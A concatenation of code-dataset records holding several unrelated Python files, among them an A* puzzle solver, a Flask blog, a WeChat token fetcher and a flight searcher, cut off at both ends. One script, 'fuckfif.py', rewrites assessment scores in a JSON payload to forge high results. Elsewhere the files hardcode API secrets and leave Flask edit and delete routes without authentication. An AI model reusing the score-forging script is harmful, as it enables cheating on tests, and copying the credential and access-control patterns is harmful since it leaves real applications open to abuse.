roof_floor_view_line:\r\n print(\"{} to {}\".format(x[0], x[1]))\r\nprint(\"floor\")\r\nfor x in floor_view_line:\r\n print(\"{} to {}\".format(x[0], x[1]))\r\n\r\nfront = open(\"front_view.csv\", \"w\", newline=\"\")\r\nwr_front = csv.writer(front)\r\nfor x in range(0, len(front_view_line)):\r\n wr_front.writerow(\r\n [front_view_line[x][0][0], front_view_line[x][0][1], front_view_line[x][0][2],\r\n front_view_line[x][1][0] ,\r\n front_view_line[x][1][1] , front_view_line[x][1][2] ])\r\nfront.close()\r\n\r\nrear = open(\"rear_view.csv\", \"w\", newline=\"\")\r\nwr_rear = csv.writer(rear)\r\nfor x in range(0, len(rear_view_line)):\r\n wr_rear.writerow(\r\n [rear_view_line[x][0][0] , rear_view_line[x][0][1] , rear_view_line[x][0][2] ,\r\n rear_view_line[x][1][0] ,\r\n rear_view_line[x][1][1] , rear_view_line[x][1][2]])\r\nrear.close()\r\n\r\nright = open(\"right_view.csv\", \"w\", newline=\"\")\r\nwr_right = csv.writer(right)\r\nfor x in range(0, len(right_side_view_line)):\r\n wr_right.writerow([right_side_view_line[x][0][0], right_side_view_line[x][0][1],\r\n right_side_view_line[x][0][2] ,\r\n right_side_view_line[x][1][0] ,\r\n right_side_view_line[x][1][1] , right_side_view_line[x][1][2] ])\r\nright.close()\r\n\r\nleft = open(\"left_view.csv\", \"w\", newline=\"\")\r\nwr_left = csv.writer(left)\r\nfor x in range(0, len(left_side_view_line)):\r\n wr_left.writerow(\r\n [left_side_view_line[x][0][0] , left_side_view_line[x][0][1] , left_side_view_line[x][0][2],\r\n left_side_view_line[x][1][0] ,\r\n left_side_view_line[x][1][1] , left_side_view_line[x][1][2] ])\r\nleft.close()\r\n\r\nroof = open(\"roof_view.csv\", \"w\", newline=\"\")\r\nwr_roof = csv.writer(roof)\r\nfor x in range(0, len(roof_floor_view_line)):\r\n wr_roof.writerow([roof_floor_view_line[x][0][0] , roof_floor_view_line[x][0][1] ,\r\n roof_floor_view_line[x][0][2] ,\r\n roof_floor_view_line[x][1][0] ,\r\n roof_floor_view_line[x][1][1] , roof_floor_view_line[x][1][2] ])\r\nroof.close()\r\n\r\nfloor = open(\"floor_view.csv\", \"w\", newline=\"\")\r\nwr_floor = csv.writer(floor)\r\nfor x in range(0, len(floor_view_line)):\r\n wr_floor.writerow(\r\n [floor_view_line[x][0][0] , floor_view_line[x][0][1] , floor_view_line[x][0][2] ,\r\n floor_view_line[x][1][0] ,\r\n floor_view_line[x][1][1] , floor_view_line[x][1][2] ])\r\nfloor.close()\r\n","sub_path":"PolyLine_Link/PolyLine_Link/PolyLine_Extraction.py","file_name":"PolyLine_Extraction.py","file_ext":"py","file_size_in_byte":13730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"495954186","text":"# Time Complexity : Add - O(2n)\n# Space Complexity :O(1)\n# Did this code successfully run on Leetcode : Yes\n# Any problem you faced while coding this : No\n'''\n1. Sliding window using slow and fast pointers\n\n2. Maintain 2 counter array of length 26 for a string and pattern.\n3. The counter will store the fequencies of any letter indexed at ascii value\n4. Now we move acrros the string, updating string counter, when the length of window == len(pattern)\n5. We check if strin counter array == patterm=n counter array, if yes, append left index of window in result\n6. We now move left by1, and right by one, but before that we undo the changes by decrementing count value\n at repective ascii \n'''\n\nclass Solution:\n \n def compare_arrays(self, arr1, arr2):\n \n for i in range(26):\n if arr1[i] != arr2[i]:\n return False\n \n return True\n \n \n def findAnagrams(self, s: str, p: str) -> List[int]:\n \n if s == \"\":\n return \n \n string_count = [0]*26\n pattern_count = [0]*26\n \n for ch in p:\n pattern_count[ord(ch)-ord('a')] += 1\n \n \n result = []\n left, right = 0, 0\n \n while right < len(s):\n \n string_count[ord(s[right]) - ord('a')] += 1\n \n if right-left+1 == len(p):\n #compare array \n if self.compare_arrays(string_count, pattern_count):\n result.append(left)\n \n string_count[ord(s[left]) - ord('a')] -= 1\n left +=1 \n \n right += 1\n return result\n ","sub_path":"find_all_anagram.py","file_name":"find_all_anagram.py","file_ext":"py","file_size_in_byte":1728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"422517820","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n#\r\n# cw_funkcje1.py\r\n# \r\n# Copyright 2020 nie wiem \r\n# \r\n# This program is free software; you can redistribute it and/or modify\r\n# it under the terms of the GNU General Public License as published by\r\n# the Free Software Foundation; either version 2 of the License, or\r\n# (at your option) any later version.\r\n# \r\n# This program is distributed in the hope that it will be useful,\r\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n# GNU General Public License for more details.\r\n# \r\n# You should have received a copy of the GNU General Public License\r\n# along with this program; if not, write to the Free Software\r\n# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,\r\n# MA 02110-1301, USA.\r\n# \r\n# \r\n\r\n\r\ndef awans(lata, zarobek, staz):\r\n\r\n for i in range (lata-1):\r\n staz+=1\r\n zarobek = zarobek + 0.1*zarobek\r\n return zarobek, staz\r\n\r\ndef drukuj(staz, zarobek):\r\n print(\"Po \", staz ,\" latach stażu bedziesz zarabiał: \", zarobek)\r\n\r\ndef main(args):\r\n staz = 1\r\n zarobek = 1000\r\n\r\n lata = int(input(\"Podaj przewidywaną ilość lat pracy: \"))\r\n \r\n zarobek, staz = awans(lata, zarobek, staz)\r\n \r\n drukuj(staz, zarobek)\r\n\r\n return 0\r\n\r\nif __name__ == '__main__':\r\n import sys\r\n sys.exit(main(sys.argv))\r\n","sub_path":"cpp/cw_funkcje1.py","file_name":"cw_funkcje1.py","file_ext":"py","file_size_in_byte":1437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"634302649","text":"# lptanh_const_grad.py\n\"\"\"\nCreated on Thu Jun 7 17:04:23 2018\n\n@author: Wentao Huang\n\"\"\"\n# lpsrelu_const_grad.py\n\"\"\"\nCreated on Thu Jun 7 12:22:38 2018\n\n@author: Wentao Huang\n\"\"\"\nimport ipdb\nimport torch as tc\nfrom .grad import Grad\nfrom . import constraint\n\nclass LPTanhConstGrad(Grad):\n\n @staticmethod\n def forward(ctx, input, C, bias=None, beta=0.9, \n isorth=True, eps=1e-6, const_fun='const_lptanh', \n beta0=0.1, const_factor=0.1, \n balance_factor=0.5, alpha=0.8, center=None):\n F = getattr(constraint, const_fun, None)\n if isinstance(bias, tc.Tensor):\n bias_requires_grad = bias.requires_grad\n else:\n bias_requires_grad = False\n if bias is not None:\n bias = beta * bias\n C1 = beta * C\n Fc = []\n dFc = []\n if center is not None:\n assert isinstance(center, list)\n# ipdb.set_trace()\n for f in center:\n f = f.mm(C1)\n if bias is not None:\n f.add_(bias)\n Fc.append(f.tanh().mul_(alpha).add_((1.0-alpha)/beta*f))\n f = f.tanh().pow_(2).add_(-1.0).mul_(-alpha*beta).add_(1.0-alpha)\n dFc.append(f)\n R = input.get_len_list()\n M = len(R)\n if balance_factor == 0.5:\n R = [0.5/(M*i) for i in R]\n else:\n R = [1.0/len(input)]*M\n r0 = const_factor/M\n input.reiter()\n obj0 = 0.0\n db = 0.0 if bias_requires_grad else None#tc.Tensor([0.0])\n dQ = 0.0\n for X, name in input:\n ith_cls = input.get_index(name)\n r = R[ith_cls]#0.0#\n# ipdb.set_trace()\n f = X.mm(C1)\n if bias is not None:\n f.add_(bias)\n f0 = f.mul((1.0-alpha)/beta)\n f.tanh_()\n f0 = f.mul(alpha).add_(f0)\n g0 = f.pow(2).add_(-1.0).mul_(-alpha*beta)\n g = g0.add_(1.0-alpha+eps)\n f.mul_(g0).mul_(-2.0).div_(g)\n if r0 > 0.0:\n objz, dQz, dbz = F(X, f0, g, center, Fc, dFc, ith_cls, \n bias_requires_grad, balance_factor, beta0, eps)\n else:\n objz = dQz = dbz = 0.0\n f0 = g0 = None\n obj0 += g.log_().sum().mul_(-r) + r0*objz\n dQ += -r*(X.t().mm(f)) + r0*dQz\n if bias_requires_grad:\n db += -r*f.sum(0) + r0*dbz\n f = g = None\n K = C.size(1)\n if K == 1:\n G = C.t().mm(C) + eps\n obj1 = -0.5*G.log()\n else:\n G = C.t().mm(C) + tc.diag(tc.full((C.size(1),), eps))\n sign, logdet = tc.slogdet(G)\n obj1 = -0.5*logdet\n dQ = dQ.mm(C.t().mm(C))\n if isorth:\n dC = dQ - C.mm(dQ.t()).mm(C)\n else:\n dC = dQ - C\n argnum = tc.tensor([13])\n ctx.save_for_backward(dC, db, argnum)\n return obj0 + obj1\n\n\n\n","sub_path":"code/learn/lptanh_const_grad.py","file_name":"lptanh_const_grad.py","file_ext":"py","file_size_in_byte":3011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"605531100","text":"import requests\nimport threading\nimport time\nfrom threading import Timer\nimport sys\nimport logging\n\ng_access_token=''\ng_update_time=time.localtime()\ng_expires_in=7200\ng_dx_expires_in=600\n\ng_appid='wxddb81ec87b64db28'\n#g_appsecret='bd2eb4735026bff4e8bbc974b26d3da7'\ng_appsecret='114cd107e4a078a85c0d74ca032db10b'\ng_url='https://api.weixin.qq.com/cgi-bin/token?grant_type=client_credential&appid={}&secret={}'\ng_headers={'Accept': 'application/json', 'Content-Type': 'application/json'}\n\ng_lock=threading.Lock()\n\ndef get_access_token():\n logging.info('fun={},ident={}'.format(sys._getframe().f_code.co_name,threading.currentThread().ident))\n g_lock.acquire()\n temp=g_access_token\n # need_update=(len(temp) <= 0)\n # if need_update is False:\n # validity_time=time.localtime(time.time()-g_expires_in+g_dx_expires_in)\n # if g_update_time < validity_time:\n # need_update = True\n g_lock.release()\n\n if len(temp) <= 0:\n update_access_token(True)\n g_lock.acquire()\n temp=g_access_token\n g_lock.release()\n else:\n validity_time=time.localtime(time.time()-g_expires_in+g_dx_expires_in)\n if g_update_time < validity_time:\n update_access_token(False)\n\n return temp\n\ndef update_access_token(sync=False):\n logging.info('fun={},ident={}'.format(sys._getframe().f_code.co_name,threading.currentThread().ident))\n logging.info('sync={}'.format(sync))\n if sync is True:\n request_access_token()\n else:\n sTimer = Timer(1, request_access_token)\n sTimer.start()\n\ndef request_access_token():\n logging.info(threading.currentThread())\n global g_access_token\n global g_expires_in\n global g_update_time\n\n r=requests.get(g_url.format(g_appid,g_appsecret),headers=g_headers)\n logging.info(\"request.status_code={},encoding={}\".format(r.status_code,r.encoding))\n json_data=r.json()\n token=json_data['access_token']\n expires_in=json_data['expires_in']\n if type(token) is str and type(expires_in) is int:\n logging.info(\"update totken is sucess\")\n g_lock.acquire()\n g_access_token=token\n g_expires_in=expires_in\n g_expires_in=605\n g_update_time=time.localtime()\n g_lock.release()\n else:\n logging.error(\"update totken is error\")\n\n logging.info('expires_in={},g_access_token={}'.format(expires_in,g_access_token))\n\n\nif __name__ == \"__main__\":\n# zwutil.init_log(True)\n update_access_token()\n \n # sTimer = Timer(1, get_access_token)\n # sTimer.start()\n # time.sleep(100)\n\n\n\n","sub_path":"webwx/wx/wxtoken.py","file_name":"wxtoken.py","file_ext":"py","file_size_in_byte":2580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"85364001","text":"import random\n\nbalicek = []\nfor hodnota in range(1, 14):\n for barva in 'Pi', 'Sr', 'Ka', 'Kr':\n balicek.append((hodnota, barva, False))\nrandom.shuffle(balicek)\n\nsloupecek = [...]\nfor sloupecek in range(1, 8):\n for radek in range(sloupecek + 1):\n sloupecek.append(balicek)","sub_path":"udelej_hru.py","file_name":"udelej_hru.py","file_ext":"py","file_size_in_byte":291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"192764712","text":"import numpy as np\n\nclass Problem:\n\tdef __init__(self, problem, heuristics, goal):\n\t\tself.problem = problem\n\t\tself.heuristics = heuristics\n\t\tself.goal = goal\n\n\tdef successor(self, state):\n\t\treturn self.problem[state]\n\nclass Node:\n\tdef __init__(self, problem, parent, state, board_state):\n\t\tself.parent = parent\n\t\tself.state = state\n\t\tself.board_state = board_state\n\t\tif parent:\n\t\t\tself.path_cost = parent.path_cost + problem.step_cost(parent.state, state)\n\t\t\tself.depth = parent.depth + 1\n\t\telse:\n\t\t\tself.path_cost = 0\n\t\t\tself.depth = 0\n\nclass Puzzle(Problem):\n\tdef __init__(self, n):\n\t\tself.n = n\n\t\tsuper().__init__(self.makeProblem(), self.generate_heuristics(), self.n_goal())\n\n\tdef makeProblem(self):\n\t\tproblem = {}\n\t\tfor i in range(self.n+1):\n\t\t\tl = int(np.sqrt(self.n+1))\n\t\t\tx = i // l\n\t\t\ty = i % l\n\t\t\tproblem[(x,y)] = []\n\t\t\tif x - 1 >= 0: \n\t\t\t\tproblem[(x,y)].append((x-1,y)) \n\t\t\tif x + 1 < l: \n\t\t\t\tproblem[(x,y)].append((x+1,y))\n\t\t\tif y - 1 >= 0: \n\t\t\t\tproblem[(x,y)].append((x,y-1))\n\t\t\tif y + 1 < l: \n\t\t\t\tproblem[(x,y)].append((x,y+1))\n\t\treturn problem\n\n\tdef generate_heuristics(self):\n\t\theuristics = {}\n\t\tfor i in range(self.n+1):\n\t\t\tl = int(np.sqrt(self.n+1))\n\t\t\tx = i // l\n\t\t\ty = i % l\n\t\t\theuristics[(x,y)] = {}\n\t\t\tfor j in range(self.n+1):\n\t\t\t\tx_j = j // l\n\t\t\t\ty_j = j % l\n\t\t\t\tif not (x_j == x and y_j == y):\n\t\t\t\t\theuristics[(x,y)][(x_j, y_j)] = np.abs(x - x_j) + np.abs(y - y_j)\n\t\treturn heuristics\n\n\tdef step_cost(self, p_state, state):\n\t\treturn 1\n\n\tdef n_goal(self):\n\t\tboard = []\n\t\tfor i in range(self.n+1):\n\t\t\tl = int(np.sqrt(self.n+1))\n\t\t\tx = i // l\n\t\t\ty = i % l\n\t\t\tboard.append((x,y))\n\t\treturn board\n\n\tdef generate_puzzle(self):\n\t\tboard = []\n\t\tfor i in range(self.n+1):\n\t\t\tl = int(np.sqrt(self.n+1))\n\t\t\tx = i // l\n\t\t\ty = i % l\n\t\t\tboard.append((x,y))\n\t\tfor i in range(self.n*3):\n\t\t\tswap_i = np.random.randint(0, len(self.problem[board[0]]))\n\t\t\tswap = self.problem[board[0]][swap_i]\n\t\t\tfor j in range(len(board)):\n\t\t\t\tif board[j] == swap: \n\t\t\t\t\tboard[j] = board[0]\n\t\t\t\t\tboard[0] = swap\n\t\t\t\t\tbreak\n\t\treturn board\n\n\tdef print_board(self, node):\n\t\tl = int(np.sqrt(self.n+1))\n\t\tboard = np.zeros((l,l))\n\t\tfor i in range(len(node.board_state)):\n\t\t\tx, y = node.board_state[i]\n\t\t\tboard[x][y] = i\n\t\tprint(board)\n\t\treturn None\n\n\t# estimated cost\n\tdef est_cost(self, node):\n\t\tcost = 0\n\t\t# count = 0\n\t\tfor i in range(len(node.board_state)):\n\t\t\tif node.board_state[i] != self.goal[i]:\n\t\t\t\t# count += 1\n\t\t\t\tcost += self.heuristics[node.board_state[i]][self.goal[i]]\n\t\treturn cost\n\n\tdef search_square(self, node, new_state):\n\t\tnew_board_state = node.board_state.copy()\n\t\ttmp = new_board_state[0]\n\t\tnew_board_state[0] = new_state\n\t\tfor i in range(1, len(new_board_state)):\n\t\t\tif new_board_state[i] == new_state:\n\t\t\t\tnew_board_state[i] = tmp\n\t\t\t\treturn new_board_state\n\n\tdef goal_test(self, node):\n\t\treturn node.board_state == self.goal\n\n\t# need think over\n\tdef remove_first(self, fringe):\n\t\tfringe.sort(key = lambda x: self.est_cost(x) + x.path_cost)\n\t\tret = fringe[0]\n\t\tdel(fringe[0])\n\t\treturn ret\n\ndef A_search(problem, start):\n\tif start == None:\n\t\t# start = problem.generate_puzzle()\n\t\treturn None\n\tfringe = [Node(problem, None, start[0], start)]\n\twhile fringe:\n\t\tnode = problem.remove_first(fringe)\n\t\tprint(\"Traversing {}, depth: {}, estimated cost: {}\".format(node.state, node.depth, problem.est_cost(node)+node.path_cost))\n\t\tproblem.print_board(node)\n\t\tif problem.goal_test(node) == True:\n\t\t\tprint(\"Puzzle solved within {} steps!\".format(node.path_cost))\n\t\t\tresult = []\n\t\t\tn = node\n\t\t\twhile n:\n\t\t\t\tresult.append(n.state)\n\t\t\t\tn = n.parent\n\t\t\tresult.reverse()\n\t\t\tprint(result)\n\t\t\treturn start, result\n\t\tfor n in problem.successor(node.state):\n\t\t\tnew_board_state = problem.search_square(node, n)\n\t\t\tfringe.append(Node(problem, node, n, new_board_state))\n\treturn None, None\n\nif __name__ == '__main__':\n\tA_search(Puzzle(8), None)\n\t# A_search(Puzzle(15))\n","sub_path":"treeSearch.py","file_name":"treeSearch.py","file_ext":"py","file_size_in_byte":3854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"64330787","text":"# -*- coding: UTF-8 -*-\n\nimport json\nimport random\n\n\ndef change(input_data, length, key, mix, max):\n for i in range(length):\n input_data[i][key] = random.randint(mix, max)\n\n\ndef change_detail(input_data, length):\n for i in range(length):\n str_tmp = input_data[i][\"ansDetail\"]\n str_pre = str_tmp[:str_tmp.find(\"#\")]\n # print(str_pre)\n str_sur = str_tmp[str_tmp.find(\"#\") + 1:]\n str_score = \"\"\n for score in str_sur.split(\",\"):\n try:\n if int(float(score)) < 85:\n int_score = float(score) + random.randint(85 - int(float(score)), 95 - int(float(score)))\n str_score += str(int_score) + \",\"\n else:\n str_score += score + \",\"\n except ValueError:\n pass\n if not str_score.endswith(\",\"):\n str_score += \",\"\n input_data[i][\"ansDetail\"] = str_pre + \"#\" + str_score\n\n\ndata = input(\"请输入post提交的jsonobject:\\n\")\ndata_json = json.loads(data.strip())\nlength = len(data_json)\nchange(data_json, length, \"score\", 86, 94) # 自己设置分数区间\nchange(data_json, length, \"accuracy\", 95, 98)\nchange(data_json, length, \"fluency\", 96, 100)\nchange(data_json, length, \"complete\", 96, 100)\nchange_detail(data_json, length)\nprint(json.dumps(data_json))\n\n\n\n\n\n\n","sub_path":"fuckfif.py","file_name":"fuckfif.py","file_ext":"py","file_size_in_byte":1355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"520967850","text":"from flask import Flask,render_template,request,session, redirect\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_mail import Mail\nfrom _datetime import datetime\nfrom werkzeug import secure_filename\nimport json\nimport os\n# plase create comment dynamicaly like post it available in Single.html\n\nwith open('config.json','r') as c:\n params = json.load(c)[\"params\"]\n\nlocal_server = True\napp = Flask(__name__)\napp.secret_key = 'supe-secret_key'\napp.config['UPLOAD_FOLDER'] = params['upload_location']\napp.config.update(\n MAIL_SERVER = 'smtp.gmail.com',\n MAIL_PORT = '465',\n MAIL_USE_SSL = True,\n MAIL_USERNAME = params['gmail-user'],\n MAIL_PASSWORD = params['gmail-password']\n)\n\nmail =Mail(app)\nif(local_server):\n app.config['SQLALCHEMY_DATABASE_URI'] = params['local_uri']\nelse:\n app.config['SQLALCHEMY_DATABASE_URI'] = params['prod_uri']\n\n\ndb = SQLAlchemy(app)\n\nclass Contacts(db.Model):\n srno = db.Column(db.Integer,primary_key=True)\n name = db.Column(db.String(80), nullable=False)\n phone_num = db.Column(db.String(12),nullable=False)\n msg = db.Column(db.String(120),nullable=False)\n date = db.Column(db.String(12),nullable=True)\n email = db.Column(db.String(20) ,nullable=False)\n\nclass Comments(db.Model):\n srno = db.Column(db.Integer,primary_key=True)\n name = db.Column(db.String(80), nullable=False)\n phone = db.Column(db.String(12),nullable=False)\n message = db.Column(db.String(120),nullable=False)\n date = db.Column(db.String(12),nullable=True)\n email = db.Column(db.String(20) ,nullable=False)\n\nclass Posts(db.Model):\n srno = db.Column(db.Integer,primary_key=True)\n title = db.Column(db.String(80), nullable=False)\n slug = db.Column(db.String(120),nullable=False)\n content = db.Column(db.String(120),nullable=False)\n date = db.Column(db.String(12),nullable=True)\n img_file = db.Column(db.String(12), nullable=False)\n\n# img not get store in location\n@app.route(\"/uploader\", methods=[\"GET\", \"POST\"])\ndef uploader():\n if ('user' in session and session['user'] == params['admin_user']):\n if (request.method == 'POST'):\n f = request.files['file1']\n f.save(os.path.join(app.config['UPLOAD_FOLDER'], secure_filename(f.filename)))\n return \"Uploaded Successfully\"\n\n#next and previous button work remain in post.html Video - 19\n@app.route(\"/post/\", methods=['GET'])\ndef post_route(post_slug):\n post = Posts.query.filter_by(slug = post_slug).first()\n return render_template('post.html', params=params, post = post)\n\n\"\"\"\n@app.route(\"/post\")\ndef post_route():\n posts = Posts.query.filter_by().all()\n return render_template('post.html', params=params, post = posts)\n\"\"\"\n#you can do this thing with single\n#not working\n@app.route(\"/getcomment\", methods = [\"GET\"])\ndef getcomment():\n comments = Comments.query.filter_by().all()\n return render_template('single.html', params=params, comments = comments)\n\n#not working\n@app.route(\"/delete/\", methods = ['GET','POST'])\ndef delete(srno):\n post = Posts.query.filter_by(srno =srno).first()\n db.session.delete(post)\n db.session.commit()\n #try to redirect dashboad page\n posts = Posts.query.all()\n return render_template('dashboard.html', params=params, posts=posts)\n\n\n\n#not working\n@app.route(\"/edit/\", methods = ['GET','POST'])\ndef edit(srno):\n #this is not works # if ('user' in session and session['user'] == params['admin_user']):\n if (request.method == 'POST'):\n box_title = request.form.get('title')\n slug = request.form.get('slug')\n content = request.form.get('content')\n img_file = request.form.get('img_file')\n date = datetime.now()\n\n if srno == '0':\n post = Posts(title=box_title, slug=slug, content= content, img_file = img_file, date = date)\n db.session.add(post)\n db.session.commit()\n else:\n post = Posts.query.filter_by(srno=srno).first()\n post.title = box_title\n post.slug = slug\n post.content = content\n post.img_file = img_file\n post.date = date\n db.session.commit()\n return redirect('/edit/'+srno)\n post = Posts.query.filter_by(srno=srno).first()\n return render_template('edit.html', params=params, post= post)\n\n@app.route('/home')\ndef home():\n name1 = \"Flask Home page\"\n return render_template('home.html', params=params)\n\n@app.route('/')\ndef login():\n name1 = \"Flask Home page\"\n return render_template('login.html', params=params)\n\n@app.route('/dashboard', methods = ['GET', 'POST'])\ndef dashboard():\n if ('user' in session and session['user'] == params['admin_user']):\n posts = Posts.query.all()\n return render_template('dashboard.html', params=params, posts = posts)\n\n if request.method == 'POST':\n username = request.form.get('username')\n userpass = request.form.get('password')\n if(username == params['admin_user'] and userpass == params['admin_password']):\n session['user'] = userpass\n posts = Posts.query.all()\n\n return render_template('dashboard.html', params=params, posts = posts)\n\n return render_template('login.html', params=params)\n\n@app.route('/logout')\ndef logout():\n session.pop('user')\n return redirect('/dashboard')\n\n\n@app.route('/portfolio')\ndef portfolio():\n name1 = \"Flask portfolio page\"\n return render_template('portfolio.html', params=params)\n\n@app.route(\"/contact\", methods=[\"GET\", \"POST\"])\ndef contact():\n title = \"Flask contact page\"\n if(request.method=='POST'):\n name = request.form.get('name')\n email = request.form.get('email')\n phone = request.form.get('phone')\n msg = request.form.get('msg')\n entry = Contacts(name = name,phone_num= phone,msg=msg, date = datetime.now(),email=email)\n db.session.add(entry)\n db.session.commit()\n mail.send_message('Hiii, New Message From ' + name, sender = email, recipients = [params['gmail-user']],\n body = msg + \"\\n\" + phone )\n return render_template('contact.html', params=params)\n\n\n@app.route(\"/comment\", methods=[\"GET\", \"POST\"])\ndef comment():\n title = \"Flask comment page\"\n if(request.method=='POST'):\n name = request.form.get('name')\n email = request.form.get('email')\n phone = request.form.get('phone')\n message = request.form.get('message')\n entry = Comments(name = name,phone= phone,message= message, date = datetime.now(),email=email)\n db.session.add(entry)\n db.session.commit()\n mail.send_message('Hiii, New Comment From ' + name, sender = email, recipients = [params['gmail-user']],\n body = message + \"\\n\" + phone )\n return render_template('single.html', params=params)\n\n\napp.run(debug=True)\n\n#app.config['SQLALCHEMY_DATABASE_URI'] = 'mysql://root:@localhost/first_flask_web'","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7084,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"436764373","text":"from typing import Any, List\nfrom .algorithm import Algorithm\nfrom multiprocessing.connection import Client\nimport multiprocessing as mp\nimport threading\nimport time\nimport weakref\nimport logging\nfrom ...utils.process_io import split_text_list, merge_result\n\nlogger = logging.getLogger(\"oknlp\")\n\ndef _courier(algorithm_weakref, client):\n while True:\n try:\n result_dict = client.recv()\n except EOFError:\n break\n except OSError:\n # Server stoped\n break\n \n thread_id, result, exc = result_dict['id'], result_dict['result'], result_dict[\"exception\"]\n\n self = algorithm_weakref()\n if self is None:\n # algorithm class deleted\n break\n\n with self._result_dict_lock:\n self._result_dict[thread_id]['result'] = result\n self._result_dict[thread_id][\"exception\"] = exc\n self._result_dict[thread_id]['event'].set()\n del self\n\nclass BatchAlgorithmClient(Algorithm):\n def __init__(self, address, family, server_name, split_sent):\n self.__address = address\n self.__family = family\n self.__server_name = server_name\n self.__closed = True\n self.split_sent = split_sent\n self.__reinit()\n \n def __getstate__(self):\n return (self.__address, self.__family, self.__closed, self.__server_name)\n\n def __setstate__(self, state):\n (self.__address, self.__family, self.__closed, self.__server_name) = state\n if not self.__closed:\n self.__reinit()\n\n def __reinit(self):\n logger.info(\"[Process %d %s]: Client reinit called\", mp.current_process().pid, self.__server_name)\n self._result_dict = {}\n self._result_dict_lock = threading.Lock()\n\n client_ok = False\n for _ in range(3):\n try:\n self.client = Client(self.__address, self.__family)\n except ConnectionRefusedError:\n time.sleep(0.5)\n else:\n client_ok = True\n break\n if not client_ok:\n raise RuntimeError(\"Failed to init client\")\n \n \n response = self.client.recv()\n if response[\"op\"] == 0:\n assert response[\"msg\"] == \"hello\"\n \n self.__closed = False\n\n logger.info(\"[Process %d %s]: Client connected\", mp.current_process().pid, self.__server_name)\n\n self.client_lock = threading.Lock() # write lock\n self.courier_thread = threading.Thread(target=_courier, args=(weakref.ref(self), self.client), daemon=True)\n self.courier_thread.start()\n \n def close(self):\n if self.__closed:\n return\n try:\n self.client.send({\"op\": 2})\n except BrokenPipeError:\n # server already exited\n pass\n self.client.close()\n\n logger.info(\"[Process %d %s]: Client disconnected\", mp.current_process().pid, self.__server_name)\n self.__closed = True\n\n def __del__(self):\n logger.info(\"[Process %d %s]: __del__ called\", mp.current_process().pid, self.__server_name)\n self.close()\n \n def __call__(self, sents : List[Any], max_length = 128):\n if self.split_sent:\n sents, is_end = split_text_list(sents, max_length)\n thread_id = threading.get_ident()\n with self._result_dict_lock:\n if thread_id not in self._result_dict:\n self._result_dict[thread_id] = {'event': threading.Event(), 'result': None}\n event = self._result_dict[thread_id]['event']\n event.clear()\n with self.client_lock:\n self.client.send({\n \"op\": 1,\n \"total_size\": len(sents),\n \"data\": sents,\n \"id\": thread_id\n })\n event.wait()\n with self._result_dict_lock:\n result = self._result_dict[thread_id]['result']\n del self._result_dict[thread_id]['result']\n exc = self._result_dict[thread_id]['exception']\n del self._result_dict[thread_id]['exception']\n if exc is not None:\n raise exc\n if self.split_sent:\n return merge_result(result, is_end)\n else:\n return result\n","sub_path":"oknlp/algorithm/abc/batch_algorithm_client.py","file_name":"batch_algorithm_client.py","file_ext":"py","file_size_in_byte":4293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"197379120","text":"\"\"\"Find the flights matching given criteria on flyniki.com or other specified website\n\nThis module exports:\n - FlightsSearcher class\n - SearchError exception type\n - IATANotFoundError exception type\n\"\"\"\n\nimport re\nimport datetime\nimport json\nimport io\nimport urllib.parse\n\nimport parse\nimport requests\nimport lxml.etree\n\nclass SearchError(RuntimeError):\n \"\"\"Indicate that the website sent an error\"\"\"\n pass\n\n\nclass IATANotFoundError(RuntimeError):\n \"\"\"Indicate that given IATA-code is not found on the website\"\"\"\n pass\n\n\nclass FlightsSearcher:\n \"\"\"This class provides the 'do_search' method\n\n It's implemented with a class (instead of a single function) since we should\n keep some cached data and the Session object between several calls\n of the 'do_search' function for increasing performance and reducing\n the traffic consumption.\n \"\"\"\n def __init__(self, domain_name='flyniki.com'):\n self.req_ses = requests.Session()\n self.airports = None\n self.vacancy_url = None\n self.domain_name = domain_name\n\n def do_search(self, from_iata, to_iata, outbound_date, return_date=None):\n \"\"\"\n Do several requests to the website (flyniki.com by default) and print found flights\n :param from_iata: IATA-code of a 'from' airport\n :param to_iata: IATA-code of a 'to' airport\n :param outbound_date: a date object\n :param return_date: a date object (None for a oneway search)\n :return: None\n \"\"\"\n\n # Check the 'from_iata' format\n try:\n self._check_iata_code(from_iata)\n except ValueError as exception:\n raise ValueError('Wrong value of the \\'from_iata\\' argument: ' + str(exception))\n\n # Check the 'to_iata' format\n try:\n self._check_iata_code(to_iata)\n except ValueError as exception:\n raise ValueError('Wrong value of the \\'to_iata\\' argument: ' + str(exception))\n\n # Check the input dates and convert them to strings\n\n if not isinstance(outbound_date, datetime.date):\n raise ValueError('The outbound_date argument must be of the date type')\n\n outbound_date_str = outbound_date.isoformat()\n\n if return_date is None:\n return_date_str = None\n else:\n if not isinstance(return_date, datetime.date):\n raise ValueError(\n 'The return_date argument must be of the date or the NoneType type'\n )\n return_date_str = return_date.isoformat()\n\n # Convert the IATA-codes into flyniki.com's format\n from_city = self._iata_to_city_name(from_iata, 'departure')\n to_city = self._iata_to_city_name(to_iata, 'destination')\n\n # Perform search\n search_reply = self._request_flights(from_city, to_city, outbound_date_str, return_date_str)\n\n # Check that the website gave exactly what we've asked\n if not self._verify_search_results(\n search_reply,\n from_iata,\n to_iata,\n outbound_date,\n return_date\n ):\n raise RuntimeError('Mismatched sent search criteria and received ones')\n\n # Print 